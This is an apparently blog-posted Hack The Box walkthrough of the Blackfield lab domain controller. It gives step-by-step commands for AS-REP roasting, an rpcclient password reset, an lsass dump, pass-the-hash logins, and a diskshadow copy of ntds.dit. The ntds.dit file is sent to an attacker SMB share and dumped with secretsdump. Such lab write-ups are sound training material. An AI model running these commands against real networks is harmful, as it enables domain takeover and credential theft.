BLACKFIELD – HACKTHEBOX

This is the Write-up/Walkthrough of the BLACKFIELD Active Directory Machine from Hackthebox.

NMAP SCAN:

53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 00:47:22Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Domain: BLACKFIELD.LOCAL, BIOS NAME: DC01

Shares found on SMB:

smbclient -L 10.10.10.192
Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share

Interacting with profiles$ share, found a list of empty directories, with username, copied all the output, saved it to a file named users.txt, and extracted the all names using awk.

cat users.txt | awk '{print $1}' > usernames.txt

Using the username, tried to check pre-auth using impacket tool GetNPUsers and I found the pre-auth hash of user support.

impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -usersfile usernames.txt -format hashcat -outputfile result.hash

Got the hash of support user.

Brute force the password using john and wordlist rockyou.txt

After, that used ldapsearch to enumerate more, but no luck, didn’t find anything.

It was long query result output of ldapsearch, didn’t find anything in it, looking forward.

After that, used bloodhound.py to enumerate domain with found credentials

/opt/BloodHound.py/bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -v --zip -c All -ns 10.10.10.192

Set up the Bloodhound and upload the zip file, looking for the Shortest path from owned principle to user audit2020, found that support user can reset the password of audit2020 user.

Looking for, how to reset the password for user audit2020, found that I can reset the audit2020 password using rpcclient..

rpcclient -U support 10.10.10.192

Set up the new password.

rpcclient $> setuserinfo2
rpcclient $> setuserinfo2 audit2020 23 hacker@1337

After that I tried connecting to winrm using evil-winrm, but it was not working, checking for share access using these credentials, it was showing the access to the forensic share.

crackmapexec smb 10.10.10.192 -u audit2020 -p 'hacker@1337' --shares

dumping everything from the forensic share using smbclient

$ smbclient //10.10.10.192/forensic -U audit2020%'hacker@1337'
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

looking for files, found there is a memory dump of different processes, found this article to dump credentials from lsass.DMP file.

unzip the lsass.zip, make sure, that downloaded the full lsass.zip file, and used pypykatz to gather the clear text credentials.

pypykatz lsa minidump lsass.DMP

after dumping using pypykatz, find the NTLM hash of user svc_backup

sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d

		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)

after getting the hash of user svc_backup, logged in using evil-winrm using the PASS THE HASH technique, and got the user flag.

evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

found that user svc_backup is in the “Backup Operators” group, which means the user can back up and restore files on the system.

net user svc_backup /domain
whoami /all
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Creating Distributed Shell file and adding commands which will be used by diskshadow.

set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:

Converting .dsh file to DOS format.

unix2dos kunal.dsh

then upload the file using evil-winrm download functionality, and used diskshadow command to create a copy of C drive to new drive named F:

diskshadow /s kunal.dsh

diskshadow command successfully copied the C: drive to F: drive.

robocopy /B Z:\Windows\NTDS . ntds.dit

after that, tried to download ntds.dit file using the download functionality of winrm, but it was failing, so I started the smbserver using impacket-smbserver and copied the ntds.dit to my linux machine.

Starting the smb server on linux.

impacket-smbserver -smb2support share.

copying the ntds.dit file.

copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit

after that used secretsdump from impacket to dump the hashes from ntds.dit and system.hive, to dump the system file from registry.

reg save hklm\system system.hive

Downloaded the system.hive also to linux machine.

impacket-secretsdump -ntds ntds.dit -system system.hive local

after getting the hash of the administrator, used evil-winrm to connect to the administrator account using pass the hash method.

evil-winrm -u administrator -H "184fb5e5178480be64824d4cd53b99ee" -i 10.10.10.192

If you face any problems, let me know in the comment.

Leave a Reply

Your email address will not be published. Required fields are marked *